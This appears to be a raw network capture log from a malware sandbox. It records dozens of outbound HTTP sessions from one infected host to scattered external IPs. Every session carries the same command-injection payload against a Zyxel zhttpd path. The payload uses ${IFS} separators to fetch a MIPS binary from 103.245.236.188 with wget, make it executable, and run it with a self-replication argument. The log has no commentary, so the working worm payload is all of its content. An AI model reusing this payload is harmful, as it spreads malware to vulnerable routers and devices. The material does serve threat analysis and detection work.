                                    Jan 13, 2024 19:02:31.110814095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3649192.168.2.133693425.47.48.196443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.110861063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3650192.168.2.135542674.86.179.219443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.111002922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3651192.168.2.1357998176.237.69.252443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.111083984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3652192.168.2.1353358151.186.122.20443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.111124992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3653192.168.2.135906266.168.64.174443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.111171007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3654192.168.2.1348228147.215.38.77443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.111211061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3655192.168.2.1343936222.7.182.195443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.111252069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3656192.168.2.134280823.123.195.188443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.111341000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3657192.168.2.1352672131.139.231.37443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.111377001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3658192.168.2.1356460178.85.236.11443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.111460924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3659192.168.2.1348670210.250.228.29443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.111493111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3660192.168.2.1358264107.173.109.74443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.111541986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3661192.168.2.1348118100.3.113.29443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.111598015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3662192.168.2.1344842150.188.184.248443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.111629009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3663192.168.2.133436236.1.162.130443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.111701012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3664192.168.2.134182823.223.180.2443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.111753941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3665192.168.2.135982446.73.121.109443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.111825943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3666192.168.2.1345874121.214.148.90443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.111912966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3667192.168.2.134973666.162.92.4443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.111941099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3668192.168.2.135323231.32.244.225443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.111979008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3669192.168.2.1349530197.46.151.254443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.112035990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3670192.168.2.1348896143.38.110.135443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.112088919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3671192.168.2.1356492158.5.191.219443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.112134933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3672192.168.2.1357904209.230.192.33443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.112205982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3673192.168.2.135256675.235.152.34443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.112247944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3674192.168.2.135058836.63.64.82443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.112293005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3675192.168.2.1356058168.201.136.196443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.112343073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3676192.168.2.135519494.72.75.102443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.112401009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3677192.168.2.134528412.215.28.184443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.112437963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3678192.168.2.133959420.229.170.88443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.112523079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3679192.168.2.1339390121.182.36.142443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.112548113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3680192.168.2.1356120108.211.72.25443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.112600088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3681192.168.2.1333964129.205.185.140443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.112632990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3682192.168.2.134614486.180.30.237443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.112699032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3683192.168.2.1333684158.64.251.146443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.112756014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3684192.168.2.135575417.186.184.209443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.112797976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3685192.168.2.134196470.146.128.236443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.112864971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3686192.168.2.1336924182.253.37.30443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.112924099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3687192.168.2.1333230137.29.45.229443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.112981081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3688192.168.2.1359264163.30.125.163443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.112998962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3689192.168.2.1358346106.195.122.37443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.113040924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3690192.168.2.1340794201.38.251.152443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.113075972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3691192.168.2.1360386114.31.10.201443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.113126040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3692192.168.2.135155474.121.99.250443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.113164902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3693192.168.2.1355900150.8.9.222443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.113212109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3694192.168.2.134714051.214.69.250443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.113257885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3695192.168.2.1353868209.146.202.182443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.113291025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3696192.168.2.1352888123.206.181.29443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.113368988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3697192.168.2.1349136205.115.234.98443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.113442898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3698192.168.2.135867035.177.92.146443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.113483906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3699192.168.2.1341086178.217.188.1443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.113548994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3700192.168.2.1338704189.212.65.164443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.113629103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3701192.168.2.133649027.222.62.106443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.113687992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3702192.168.2.13565904.18.5.141443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.113765001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3703192.168.2.1346578194.92.186.237443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.113781929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3704192.168.2.133857879.209.193.4443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.113827944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3705192.168.2.134006876.168.31.27443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.113904953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3706192.168.2.1357322178.234.219.60443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.113944054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3707192.168.2.133838494.233.183.220443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.114002943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3708192.168.2.133635832.16.41.220443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.114049911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3709192.168.2.1339278110.140.62.230443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.114092112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3710192.168.2.1358378181.136.70.106443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.114171028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3711192.168.2.1351018179.148.153.143443
                                    TimestampBytes transferredDirectionData
